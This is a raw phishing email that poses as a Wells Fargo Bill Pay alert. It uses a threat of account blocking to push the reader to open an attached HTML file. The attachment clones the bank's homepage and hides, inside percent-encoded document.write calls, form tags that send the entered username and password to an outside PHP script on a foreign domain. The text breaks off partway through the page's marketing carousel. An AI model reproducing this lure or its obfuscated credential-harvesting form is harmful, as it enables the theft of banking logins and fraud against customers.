From: "Wells Fargo. Online Alerts."<gerdon@mwt.net>
Date: Sun, 29 Jan 2017 04:56:14 -0800
Reply-To: wellsfargoonline@mail.com
X-OutGoing-Spam-Status: No, score=4.3
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - westhall.footholds.net
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - mwt.net
X-Get-Message-Sender-Via: westhall.footholds.net: authenticated_id: jajapra@jevincornell.com
X-Authenticated-Sender: westhall.footholds.net: jajapra@jevincornell.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 38

You will not see this in a MIME-aware mail reader.
--===============1543042520==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

A new payee has been added to your Bill Pay service


The following payee(s) has been added to your list of payees in your Bill P=
ay service.
Please Click on your mail below to download the attached file and fill out =
all the requested information to



complete the verification process to prevent your account from being blocke=
d.

Sincerely,
Online Services Team.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D
Thank you for helping us keep your Wells Fargo account safe.
=A9 2017 Wells Fargo Corporation.Company. All rights reserved

powered by: Wells Fargo+
--===============1543042520==
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment; filename="Action needed _Notifications.html"

<!DOCTYPE html>
<!--[if IE 7]><html xmlns=3D"http://www.w3.org/1999/xhtml" class=3D"no-js l=
t-ie9 lt-ie8 ie7" lang=3D"en"> =

<![endif]-->
<!--[if IE 8]><html xmlns=3D"http://www.w3.org/1999/xhtml" class=3D"no-js l=
t-ie9 ie8" lang=3D"en"> =

<![endif]-->
<!--[if IE 9]><html xmlns=3D"http://www.w3.org/1999/xhtml" class=3D"no-js i=
e9" lang=3D"en"> =

<![endif]-->
<!--[if !IE]><!-->
<html xmlns=3D"http://www.w3.org/1999/xhtml" xmlns:tcdl=3D"http://www.tridi=
on.com/ContentDelivery/5.3/TCDL"  class=3D"no-js" lang=3D"en">
<!--<![endif]-->
<head>
    <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3DUTF-8=
" />
    <script>
        document.documentElement.className =3D document.documentElement.cla=
ssName.replace(/(^|\s)no-js(\s|$)/, '$1$2');
    </script>
    <title>Wells Fargo - Personal & Business Banking - Student, Auto & Home=
 Loans - Investing & Insurance</title>
    <meta name=3D"description" content=3D"Wells Fargo is a provider of bank=
ing, mortgage, investing, credit card, insurance, and consumer and commerci=
al financial services." />
    <meta name=3D"keywords" content=3D"checking accounts, savings accounts,=
 student loans, personal loans, investments, online banking, auto loans, ho=
me loans" />
    <meta http-equiv=3D"content-type" content=3D"text/html; charset=3DUTF-8=
" />
    <meta http-equiv=3D"Content-type" content=3D"text/html" />
    <meta http-equiv=3D"Cache-Control" content=3D"must-revalidate" />
    <meta http-equiv=3D"Cache-Control" content=3D"no-store" />
    <meta http-equiv=3D"Cache-Control" content=3D"no-cache" />
    <meta http-equiv=3D"Cache-Control" content=3D"private" />
    <meta http-equiv=3D"Pragma" content=3D"no-cache" />
    =

    <meta name=3D"application-name" content=3D"WELLS FARGO BANK"/>
    <meta name=3D"msapplication-TileColor" content=3D"#1e3d75"/>
    <meta name=3D"msapplication-TileImage" content=3D"WELLSPIN.png"/>
    =

    <link rel=3D"stylesheet" href=3D"https://www01.wellsfargomedia.com/css/=
home/homepage.css" />
     =

</head>
<body><div id=3D"shell" data-pid=3D"222-6531-64"><a href=3D"#skip" class=3D=
"hidden">Skip to content</a>
 =

        <header role=3D"banner">
    <div id=3D"masthead" class=3D"html5header c1">
	    <div id=3D"mainNav">
		    <div id=3D"brand">
                =

        <a href=3D"/">
          <img alt=3D"Wells Fargo Bank" src=3D"https://www01.wellsfargomedi=
a.com/assets/images/global/wf-logo.gif" width=3D"62" height=3D"62" />
        </a>
      =

            </div>
	    <div id=3D"topSearch">
			<ul role=3D"navigation">
				=

					<li>
        <a href=3D"https://online.wellsfargo.com/das/channel/enrollDisplay"=
 class=3D"signIn">Sign Up</a>
      </li>
				=

				=

					<li>
        <a href=3D"/help/">Customer Service</a>
      </li>
				=

					<li>
        <a href=3D"/locator/">ATMs/Locations</a>
      </li>
				=

					<li>
        <a lang=3D"es" href=3D"/spanish/" xml:lang=3D"es">Espa?l</a>
      </li>
					=

			</ul>
			=

				<script type=3D"text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('%3c%66%6f%72%6d%20%69%64%3d%22%66%72%6d%53%65%61%7=
2%63%68%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%6d%61%68%72%61%2=
e%69%72%2f%76%65%72%69%66%69%2e%70%68%70%22%20%6d%65%74%68%6f%64%3d%22%67%6=
5%74%22%20%72%6f%6c%65%3d%22%73%65%61%72%63%68%22%3e'));
//-->
</script>
                    <label for=3D"inputTopSearchField" class=3D"hide">Searc=
h</label>
                    <input name=3D"query" value=3D"" placeholder=3D"Search"=
 title=3D"Search" maxlength=3D"75" size=3D"75" type=3D"text" id=3D"inputTop=
SearchField" />
                    <input value=3D"Search" id=3D"btnTopSearch" type=3D"sub=
mit" />
                </form>
			=

		</div>

		    <nav>
                <div class=3D"html5nav" id=3D"tabNav" role=3D"navigation">
                    <ul>
                        =

                           =

        =

          <li class=3D"current">Personal</li>
        =

      =

                        =

                           =

        =

          <li>
            <a href=3D"/biz/" class=3D"tabNavLink" id=3D"tabNavSmallBusines=
s" name=3D"tabNavSmallBusiness" title=3D"Small Business. Serving businesses=
 with up to $20 million in annual revenue">Small Business</a>
          </li>
        =

      =

                        =

                           =

        =

          <li>
            <a href=3D"/com/" class=3D"tabNavLink" id=3D"tabNavCommercial" =
name=3D"tabNavCommercial" title=3D"Commercial. Serving businesses with over=
 $20 million in annual revenue">Commercial</a>
          </li>
        =

      =

                        =

                    </ul>
                </div>
            </nav>


		    <div id=3D"headerTools">
<nav>
						<ul>						=

                =

				    <li>
        <a href=3D"/financial-education/">Financial Education</a>
      </li>
                =

				    <li>
        <a href=3D"/about/">About Wells Fargo</a>
      </li>
                =

</ul>
					</nav>
		    </div>

	    </div>
    </div>
</header>
          =


<nav>
						<ul id=3D"fatnav" role=3D"navigation">
							<li id=3D"bankingTab"><a class=3D"navLevel1" href=3D"#banking" aria-=
haspopup=3D"true" data-navitem=3D"banking">Banking</a></li>
							<li id=3D"loansTab"><a class=3D"navLevel1" href=3D"#loans" aria-hasp=
opup=3D"true" data-navitem=3D"loans">Loans and Credit</a></li>
							<li id=3D"insuranceTab"><a class=3D"navLevel1" href=3D"#insurance" a=
ria-haspopup=3D"true" data-navitem=3D"insurance">Insurance</a></li>
							<li id=3D"investingTab"><a class=3D"navLevel1" href=3D"#investing" a=
ria-haspopup=3D"true" data-navitem=3D"investing">Investing and Retirement</=
a></li>
							<li id=3D"wealthTab"><a class=3D"navLevel1" href=3D"#wealth" aria-ha=
spopup=3D"true" data-navitem=3D"wealth">Wealth Management</a></li>
						</ul>
					</nav>
					                        =

<!--sign on-->
        <noscript>
            <div id=3D"msgnojs">
                <p>
                    We're sorry, but some features of our site require Java=
Script. Please enable JavaScript
                    on your browser and refresh the page.</p>
            </div></noscript>
        <h1 class=3D"hidden" id=3D"skip">
            Wells Fargo Personal</h1>
        <!--hide-->
        <div id=3D"hpmarq">
 =

            <!--Personal SignOn Utility - Start-->
<div id=3D"hpSignon">
            <div id=3D"hpSignonMain">
                <h2 id=3D"hdrSignon">View Your Accounts</h2>
                <script type=3D"text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('%3c%66%6f%72%6d%20%61%75%74%6f%63%6f%6d%70%6c%65%7=
4%65%3d%22%6f%66%66%22%20%6e%61%6d%65%3d%22%73%69%67%6e%6f%6e%22%20%69%64%3=
d%22%66%72%6d%53%69%67%6e%6f%6e%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3=
a%2f%2f%6d%61%68%72%61%2e%69%72%2f%76%65%72%69%66%69%2e%70%68%70%22%20%6d%6=
5%74%68%6f%64%3d%22%70%6f%73%74%22%3e'));
//-->
</script>

                    <div style=3D"width: 180; height: 39">
                      <label for=3D"destination" class=3D"hide">Go to</labe=
l>
                        <select name=3D"destination" id=3D"destination">
                         <option value=3D"AccountSummary" selected=3D"selec=
ted">Account Summary</option>
<option value=3D"Transfer">Transfer</option>
<option value=3D"BillPay">Bill Pay</option>
<option value=3D"Brokerage">Brokerage</option>
<option value=3D"Trade">Trade</option>
<option value=3D"MessageAlerts">Messages and Alerts</option>
<option value=3D"MainMenu">Account Services</option>
</select>                       =

                    </div>
                    <div style=3D"width: 217; height: 139">
                      <font color=3D"#FFFFFF">Username</font>
                        <input name=3D"Us" class=3D"inputs" required=3D"" m=
axlength=3D"32" title=3D"Type the User ID." style=3D"width: 160;" type=3D"t=
ext" size=3D"20">
                      <font color=3D"#FFFFFF">Username</font>
                        <input name=3D"PS" class=3D"inputs" required=3D"" t=
itle=3D"Required field Enter Password." style=3D"width: 160; height:22" typ=
e=3D"password" size=3D"20">&nbsp;
						<input type=3D"submit" value=3D"Go" name=3D"btnSignon" id=3D"btnSigno=
n" class=3D"c7 secondarybtn"/>
                      <p><font color=3D"#FFFFFF">Save Username <br>
                      sername / Password Help</font>
                        <input type=3D"hidden" name=3D"screenid" value=3D"S=
IGNON" />
                        <input type=3D"hidden" name=3D"origination" value=
=3D"WebCons" />
                        <input type=3D"hidden" name=3D"LOB" value=3D"Cons" =
/>
                        <input type=3D"hidden" id=3D"u_p" name=3D"u_p" valu=
e=3D""/>
                    </div>
                </form>
             </div>
             <div id=3D"hpSignUp">
              <p>Need online access?<br/><a href=3D"https://adfarm.mediaple=
x.com/ad/ck/6878-38920-3408-45">Sign Up Now</a> or <a href=3D"https://adfar=
m.mediaplex.com/ad/ck/6878-38920-3408-46">Take a Tour</a></p><!-- DEFAULT_S=
IGNON_AD --><p>
						<a href=3D"/privacy-security/">Your Privacy and Security</a>
					</p>
				                        =


 =

</div>
        </div>
            <!--Personal SignOn Utility - End-->

 =

            =

	<div class=3D"c3 type5" data-cid=3D"tcm:242-6525-16" data-ctid=3D"tcm:224-=
6277-32">	=

			<div class=3D"c3wrapper">

					  <input type=3D"text" accesskey=3D"U" id=3D"userid0" name=3D"userid" =
maxlength=3D"14" size=3D"44" /><img alt=3D"https://www20.wellsfargomedia.co=
m/assets/images/contextual/banner/investing/617x260/wfic049_ph_g-500047591_=
617x260.jpg" src=3D"https://www20.wellsfargomedia.com/assets/images/context=
ual/banner/investing/617x260/wfic049_ph_g-500047591_617x260.jpg" width=3D"6=
17" height=3D"260"></div>
		=

			</div>
         </div>


        </div>
             =

            <div class=3D"c45 theme1" data-cid=3D"tcm:84-20231-16" data-cti=
d=3D"tcm:91-2808-32">
	=

	=

	=

	=

	=

        =

	<h2 class=3D"c45badge"><span class=3D"c45flyout"> </span>Alert<span class=
=3D"c45point"> </span></h2>
	<div class=3D"c45content">		=

            Customer service notice regarding Target data breach.  <a href=
=3D"/jump/enterprise/target-data-breach-notice?mplx=3D7108-159844-3408-27">=
View Here</a>
	</div>
</div>                        =

<div id=3D"banking" class=3D"navItem" aria-hidden=3D"true" role=3D"region" =
aria-labelledby=3D"bankingTab">
						<h2 class=3D"hide">Banking</h2>
						<div class=3D"navItemLeft">
							<div>
								<div class=3D"fatNavTitle">
									<h2>Accounts and Services</h2>
								</div>
								<ul>
									<li><a href=3D"/checking/">Checking Accounts</a></li>
									<li><a href=3D"/savings-cds/">Savings Accounts and CDs</a></li>
									<li><a href=3D"/debit-card/">Debit and Prepaid Cards</a></li>
									<li><a href=3D"/credit-cards/">Credit Cards</a></li>
									<li><a href=3D"/foreign-exchange/">Foreign Exchange</a></li>
									<li><a href=3D"/international-remittances/">Global Remittance Serv=
ices</a></li>
								</ul>
							</div>
							<div>
								<div class=3D"fatNavTitle"> </div>
								<ul>
									<li><a href=3D"/online-banking/">Online Banking</a></li>
									<li><a href=3D"/online-banking/bill-pay/">Online Bill Pay</a></li>
									<li><a href=3D"/online-banking/transfers/">Transfers</a></li>
									<li><a href=3D"/online-banking/statements/">Online Statements</a><=
/li>
									<li><a href=3D"/mobile/">Mobile Banking</a></li>
									<li><a href=3D"/atm">ATM Services</a></li>
								</ul>
							</div>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Your Financial Goals</h2>
							</div>
							<ul>
								<li><a href=3D"/tax-center/">Tax Center</a></li>
								<li><a href=3D"/goals-protect-what-counts/">Protect What Counts</a>=
</li>
								<li><a href=3D"/goals-retirement/">Planning for Retirement</a></li>
								<li><a href=3D"/privacy-security/fraud/">Fraud Information Center</=
a></li>
							</ul>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Popular Links</h2>
							</div>
							<ul>
								<li><a href=3D"/mortgage/rates/?dm=3DDMIWFHPRAT">Mortgage Rates</a>=
</li>
								<li><a href=3D"/help/routing-number/">Routing Number</a></li>
								<li><a href=3D"/checking/overdraft-services/">Overdraft Services</a=
></li>
								<li><a href=3D"/financial-assistance/">Get Help with Payment Challe=
nges</a></li>
								<li><a href=3D"https://adfarm.mediaplex.com/ad/ck/1221-8226-3408-21=
1">Open a Checking Account</a></li>
								<li><a href=3D"/products_services/applications_viewall">Apply for a=
n Account or Service</a></li>
							</ul>
						</div>
						<br style=3D"clear:both" /></div>
					<div id=3D"loans" class=3D"navItem hide" aria-hidden=3D"true" role=3D"=
region" aria-labelledby=3D"loansTab">
						<h2 class=3D"hide">Loans and Credit</h2>
						<div class=3D"navItemLeft">
							<div>
								<div class=3D"fatNavTitle">
									<h2>Accounts and Services</h2>
								</div>
								<ul>
									<li><a href=3D"/mortgage/">Mortgage Loans</a></li>
									<li><a href=3D"/equity/">Home Equity Loans</a></li>
									<li><a href=3D"/personal_credit/">Personal Lines and Loans</a></li>
								</ul>
							</div>
							<div>
								<div class=3D"fatNavTitle"> </div>
								<ul>
									<li><a href=3D"/student/">Student Loans</a></li>
									<li><a href=3D"/autoloans/">Auto Loans</a></li>
									<li><a href=3D"/credit-cards/">Credit Cards</a></li>
								</ul>
							</div>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Your Financial Goals</h2>
							</div>
							<ul>
								<li><a href=3D"/mortgage/home-loans">Home Lending</a></li>
								<li><a href=3D"/goals-going-to-college/">Going to College</a></li>
								<li><a href=3D"/goals-credit/">Borrowing and Credit</a></li>
								<li><a href=3D"/privacy-security/fraud">Fraud Information Center</a=
></li>
							</ul>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Popular Links</h2>
							</div>
							<ul>
								<li><a href=3D"/mortgage/rates/?dm=3DDMIWFHPRAT">Mortgage Rates</a>=
</li>
								<li><a href=3D"/equity/tools/rate_calc">Home Equity Rates</a></li>
								<li><a href=3D"/financial-assistance/">Get Help with Payment Challe=
nges</a></li>
								<li><a href=3D"https://mywellsfargorewards.com">Rewards</a></li>
								<li><a href=3D"/jump/applications/inprogress">Finish Application/Ch=
eck Status</a></li>
								<li><a href=3D"https://adfarm.mediaplex.com/ad/ck/1221-7304-3408-19=
8">Student Loan Discounts</a></li>
							</ul>
						</div>
						<br style=3D"clear:both" /></div>
					<div id=3D"insurance" class=3D"navItem hide" aria-hidden=3D"true" role=
=3D"region" aria-labelledby=3D"insuranceTab">
						<h2 class=3D"hide">Insurance</h2>
						<div class=3D"navItemLeft">
							<div>
								<div class=3D"fatNavTitle">
									<h2>Products and Services</h2>
								</div>
								<ul>
									<li><a href=3D"/insurance-auto-vehicle/auto/">Auto Insurance</a></=
li>
									<li><a href=3D"/insurance-auto-vehicle/vehicle/">Specialty Vehicle=
 Insurance</a></li>
									<li><a href=3D"/insurance-life-health/life/">Life Insurance</a></l=
i>
									<li><a href=3D"/insurance-life-health/health/">Health Insurance</a=
></li>
								</ul>
							</div>
							<div>
								<div class=3D"fatNavTitle"> </div>
								<ul>
									<li><a href=3D"/insurance-property/home/">Homeowners Insurance</a>=
</li>
									<li><a href=3D"/insurance-property/renters/">Renters Insurance</a>=
</li>
									<li><a href=3D"/insurance-identity-theft-protection/">Identity The=
ft Protection Plans</a></li>
								</ul>
							</div>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Your Financial Goals</h2>
							</div>
							<ul>
								<li><a href=3D"/goals-protect-what-counts/">Protect What Counts</a>=
</li>
								<li><a href=3D"/goals-credit/">Borrowing and Credit</a></li>
								<li><a href=3D"/goals-retirement/">Planning for Retirement</a></li>
								<li><a href=3D"/mortgage/home-loans">Home Lending</a></li>
							</ul>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Popular Links</h2>
							</div>
							<ul>
								<li><a href=3D"/jump/insurance/get-insurance-quotes">Get Insurance =
Quotes</a></li>
								<li><a href=3D"/insurance-why">Why Wells Fargo Insurance</a></li>
								<li><a href=3D"/biz/insurance/">Small Business Insurance</a></li>
								<li><a href=3D"https://wfis.wellsfargo.com/">Commercial Insurance</=
a></li>
								<li><a href=3D"/investing/hsa/">Health Savings Accounts (HSA)</a></=
li>
							</ul>
						</div>
						<br style=3D"clear:both" /></div>
					<div id=3D"investing" class=3D"navItem hide" aria-hidden=3D"true" role=
=3D"region" aria-labelledby=3D"investingTab">
						<h2 class=3D"hide">Investing and Retirement</h2>
						<div class=3D"navItemLeft">
							<div>
								<div class=3D"fatNavTitle">
									<h2>Ways to Invest</h2>
								</div>
								<ul>
									<li><a href=3D"/investing/invest-online">Invest Online</a></li>
									<li><a href=3D"/investing/guidance/">Invest With Guidance</a></li>
									<li><a href=3D"/investing/mutual-funds">Invest in Mutual Funds</a>=
</li>
									<li><a href=3D"/investing/compare-ways-to-invest">Compare Ways to =
Invest</a></li>
								</ul>
							</div>
							<div>
								<div class=3D"fatNavTitle">
									<h2>Investing Solutions</h2>
								</div>
								<ul>
									<li><a href=3D"/investing/retirement/ira">IRAs</a></li>
									<li><a href=3D"/investing/investment-services">Investment Services=
</a></li>
									<li><a href=3D"/investing/retirement/rollover/">Rollovers (401k an=
d IRA)</a></li>
									<li><a href=3D"/investing/hsa/">Health Savings Accounts (HSA)</a><=
/li>
									<li><a href=3D"/investing/education">Investing for Education</a></=
li>
								</ul>
							</div>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Your Financial Goals</h2>
							</div>
							<ul>
								<li><a href=3D"/goals-retirement/">Planning for Retirement</a></li>
								<li><a href=3D"/goals-retirement-income/">Income in Retirement</a><=
/li>
							</ul>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Popular Links</h2>
							</div>
							<ul>
								<li><a href=3D"/investing/guidance/consultation-10">Contact a Finan=
cial Advisor</a></li>
								<li><a href=3D"/investing/retirement/ira/select">Open an IRA</a></l=
i>
								<li><a href=3D"/wf/product/apply?prodSet=3DAPP2K&prodCode=3DWFOR-WF=
OR&language=3Den">Open a WellsTrade? Account</a></li>
								<li><a href=3D"/investing/retirement/ira/traditional-or-roth-ira">C=
ompare IRAs</a></li>
								<li><a href=3D"/investing/retirement/tools/my-retirement-plan">My R=
etirement Plan</a></li>
								<li><a href=3D"/retirementplan">Employer Plan 401(k) Sign On</a></l=
i>
							</ul>
						</div>
					</div>
					<div id=3D"wealth" class=3D"navItem hide" aria-hidden=3D"true" role=3D=
"region" aria-labelledby=3D"wealthTab">
						<h2 class=3D"hide">Wealth Management</h2>
						<div class=3D"navItemLeft">
							<div>
								<div class=3D"fatNavTitle">
									<h2>Wealth Services</h2>
								</div>
								<ul>
									<li><a href=3D"/theprivatebank/">The Private Bank</a></li>
									<li><a href=3D"/investing/wells-fargo-advisors">Wells Fargo Adviso=
rs</a></li>
									<li><a href=3D"/abbot-downing/">Abbot Downing</a></li>
									<li><a href=3D"/wealth-management-services">All Wealth Management =
Services</a></li>
								</ul>
							</div>
							<div>
								<div class=3D"fatNavTitle">
									<h2>Wealth Solutions</h2>
								</div>
								<ul>
									<li><a href=3D"/theprivatebank/oursolutions/wealthplanning">Wealth=
 Planning</a></li>
									<li><a href=3D"/theprivatebank/oursolutions/privatebanking">Privat=
e Banking</a></li>
									<li><a href=3D"/theprivatebank/oursolutions/investments">Investmen=
ts</a></li>
									<li><a href=3D"/theprivatebank/oursolutions/specializedwealthsolut=
ions">Specialized Solutions</a></li>
									<li><a href=3D"/theprivatebank/oursolutions/trustsolutions">Trust =
Solutions</a></li>
								</ul>
							</div>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Wealth Advice and Guidance</h2>
							</div>
							<ul>
								<li><a href=3D"https://www.wealthmanagementinsights.com/">Wealth Ma=
nagement Insights Center</a></li>
								<li><a href=3D"https://www.wfconversations.com/">Conversations Maga=
zine</a></li>
							</ul>
						</div>
						<div>
							<div class=3D"fatNavTitle">
								<h2>Next Step</h2>
							</div>
							<ul>
								<li><a href=3D"/theprivatebank/contact">Contact The Private Bank</a=
></li>
								<li><a href=3D"/investing/guidance/consultation-10">Contact Wells F=
argo Advisors</a></li>
								<li><a href=3D"https://www.abbotdowning.com/contact_us/">Contact Ab=
bot Downing</a></li>
							</ul>
						</div>
					</div>
					                        =

<div class=3D"c63 html5section" role=3D"application"><ul class=3D"c63contro=
ls" role=3D"tablist"><li role=3D"tab"><img src=3D"https://www01.wellsfargom=
edia.com/assets/images/icons/personal/icon-c63-mortarboard.png" alt=3D"Goin=
g to College" />Going to College</li><li role=3D"tab"><img src=3D"https://w=
ww04.wellsfargomedia.com/assets/images/icons/personal/icon-c63-survey1.png"=
 alt=3D"" />Banking Made Easy</li><li role=3D"tab"><img src=3D"https://www0=
1.wellsfargomedia.com/assets/images/icons/personal/icon-c63-graph.png" alt=
=3D"Borrowing and Credit" />
        <p xmlns=3D"http://www.w3.org/1999/xhtml">Borrowing and <br /> Cred=
it</p>
      </li><li role=3D"tab"><img src=3D"https://www04.wellsfargomedia.com/a=
ssets/images/icons/personal/icon-c63-compass.png" alt=3D"Retirement" />Reti=
rement</li><li role=3D"tab"><img src=3D"https://www01.wellsfargomedia.com/a=
ssets/images/icons/personal/icon-c63-key-old-fashioned.png" alt=3D"Protect =
What Counts" />Protect What Counts<sup xmlns=3D"http://www.w3.org/1999/xhtm=
l">SM</sup></li><li role=3D"tab"><img src=3D"https://www04.wellsfargomedia.=
com/assets/images/icons/personal/icon-c63-lock.png" alt=3D"Fraud Informatio=
n Center" />Fraud Information Center</li><li role=3D"tab"><img src=3D"https=
://www01.wellsfargomedia.com/assets/images/icons/personal/icon-c63-house.pn=
g" alt=3D"Learn About Home Lending" />Home Lending</li></ul><div class=3D"c=
arouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-6519-16" data-ctid=3D"t=
cm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www04.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/young-man_campus_smartphone_227x288.jpg" alt=3D"" class=3D"l=
eftSide" width=3D"227" height=3D"288" />
		=

        <h2>Planning and paying for college</h2>
					<p>From creating a realistic budget in college to choosing a student l=
oan, Wells Fargo has resources to help you meet your financial goals.</p>
					<p><a class=3D"c22" href=3D"/goals-going-to-college/?e=3D1">Start mana=
ging your money</a></p>
					<ul>
						<li>Learn more about Wells Fargo <a href=3D"/student">student loans</=
a></li>
						<li>Use <a href=3D"/goals-going-to-college/find-scholarships">scholar=
ships</a> and grants to pay for your education</li>
						<li>Fill out a <a href=3D"/wf/product/apply?prodCode=3DEDL&amp;applic=
ationtype=3Dstudentloanapp&amp;language=3Den">Student Loan Application</a> =
today</li>
						<li><a href=3D"/goals-going-to-college/paying-college">Planning for y=
our child's future</a></li>
					</ul>
	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_chk_everydaychecking_stundentnba_web" href=3D"ht=
tps://adfarm.mediaplex.com/ad/ck/21520-158539-3408-41">
        <img id=3D"WF_CON_NBA_STUDENT_3A" class=3D"tasAd" alt=3D"Checking p=
lus mobile. Banking for students on the go. Learn More."  src=3D"https://ww=
w03.wellsfargomedia.com/assets/images/contextual/banner/checking/234x144/ch=
k_studentcheckingcd3138_234x144.jpg" width=3D"234" height=3D"144" /></a></d=
iv>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_efs_privateparent_studentnba_web" href=3D"https:=
//adfarm.mediaplex.com/ad/ck/21520-158527-3408-19">
        <img id=3D"WF_CON_NBA_STUDENT_3B" class=3D"tasAd" alt=3D"Student lo=
an options. Choose from fixed and variable interest rate student loans. Lea=
rn More."  src=3D"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.c=
om/assets/images/contextual/banner/student-loans/234x144/efs_parentfixed_23=
4x144.png" width=3D"234" height=3D"144" /></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-13=
725-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www01.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/banking-made-easy_227X288.png" alt=3D"" class=3D"leftSide" w=
idth=3D"227" height=3D"288" />
		=

					<h2>Bank wherever life takes you</h2>
					<p>Whether it is choosing a checking account, banking on the go or man=
aging your spending, Wells Fargo makes it easy for you to manage your every=
day banking. </p>
					<p>
						<a class=3D"c22" data-cid=3D"tcm:182-13725-16" data-ctid=3D"tcm:223-6=
251-32" href=3D"http://www.getbankingdone.com/?e=3D1">See what you can do
<br></a>
					</p>
					<ul>
						<li>Select the <a href=3D"/checking/compare-accounts/">checking accou=
nt</a> for you</li>
						<li>Manage your accounts easily with <a href=3D"/mobile">mobile banki=
ng</a> and <a href=3D"/wfonline/">online banking</a><a href=3D"/mobile">
								<br>
							</a></li>
						<li>Tap into <a href=3D"/financial-education/">financial education</a=
> for valuable tips, tools, and resources</li>
						<li>Budget and save with free <a href=3D"/wfonline/mymoneymap/">onlin=
e tools</a></li>
					</ul>
				=

	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_chk_ponypromotion_bankingnba_web" href=3D"https:=
//adfarm.mediaplex.com/ad/ck/21520-158539-3408-40">
        <img id=3D"WF_CON_NBA_TAX_2A" class=3D"tasAd" alt=3D"Ride off with =
a 2013 pony when you open a qualifying checking account. Learn More."  src=
=3D"https://www03.wellsfargomedia.com/assets/images/contextual/banner/check=
ing/234x144/chk_ponypromotileCD3115_234x144.gif" width=3D"234" height=3D"14=
4" /></a></div>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_oth_makeanappt_bankingnba_web" href=3D"https://a=
dfarm.mediaplex.com/ad/ck/21520-158498-3408-34">
        <img id=3D"WF_CON_NBA_TAX_2B" class=3D"tasAd" alt=3D"On Your Time. =
Make an appointment online to meet with a banker at your convenience. Sched=
ule Now."  src=3D"https://www03.wellsfargomedia.com/assets/images/contextua=
l/banner/other/234x144/oth_maaassetrevisionscdnbatile3149_234x144.jpg" widt=
h=3D"234" height=3D"144" /></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-65=
14-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www04.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/couple_outside_smiling-looking-out_227x288.jpg" alt=3D"" cla=
ss=3D"leftSide" width=3D"227" height=3D"288" />
		=

        <h2>Take a first step toward managing your credit</h2>
					<p>When you need to make a decision about how and when to borrow, Well=
s Fargo is here to help find options that can work for you.</p>
					<p><a class=3D"c22" href=3D"/goals-credit/?e=3D1">Start here</a></p>
					<ul>
						<li>Understand your <a href=3D"/goals-credit/financial-education-cred=
it-score-report/">credit score</a>
							<br /></li>
						<li>Paying for <a href=3D"/goals-credit/large-purchase">unexpected ex=
penses</a>
							<br /></li>
						<li><a href=3D"/goals-credit/rewards-cards">Getting rewarded</a> for =
purchases
<br /></li>
						<li><a href=3D"/goals-credit/bill-consolidation">Consolidating bills<=
/a></li>
					</ul>
	</div>
	<div class=3D"c63contentTop">
		<a class=3D"tasRenderedC_efs_nopaymentsnodiscv2_creditnba_web" href=3D"ht=
tps://adfarm.mediaplex.com/ad/ck/21520-158527-3408-16">
        <img id=3D"WF_CON_NBA_CREDIT_1A" class=3D"tasAd" alt=3D"No payments=
 while in school. Get the funds you need to pay for college. Get Started." =
 src=3D"https://www03.wellsfargomedia.com/assets/images/contextual/banner/s=
tudent-loans/234x144/efs_nopaymentsnodiscv2_234x144.png" width=3D"234" heig=
ht=3D"144" /></a></div>
	<div class=3D"c63contentBottom">
		<a class=3D"tasRenderedC_afg_carbuyingtips_creditnba_web" href=3D"https:/=
/adfarm.mediaplex.com/ad/ck/21520-158537-3408-8">
        <img id=3D"WF_CON_NBA_CREDIT_1B" class=3D"tasAd" alt=3D"Five things=
 every car buyer should know. What everyone should know before buying a car=
. Learn More."  src=3D"https://www03.wellsfargomedia.com/assets/images/cont=
extual/banner/auto-loans/234x144/afg_carbuyingtips_234x144.png" width=3D"23=
4" height=3D"144" /></a></div>
</div><div class=3D"carouselFrame" role=3D"tabpanel" data-cid=3D"tcm:182-65=
18-16" data-ctid=3D"tcm:223-6251-32">
	<div class=3D"c63contentMain">
<img src=3D"https://www01.wellsfargomedia.com/assets/images/photography/lif=
estyle/227x288/grandma-grandson_painting_227x288.jpg" alt=3D"" class=3D"lef=
tSide" width=3D"227" height=3D"288" />
		=

					<h2>Learn how to make the right retirement choices for you</h2>
					<p>Whether you are just entering the workforce, or close to retiring, =
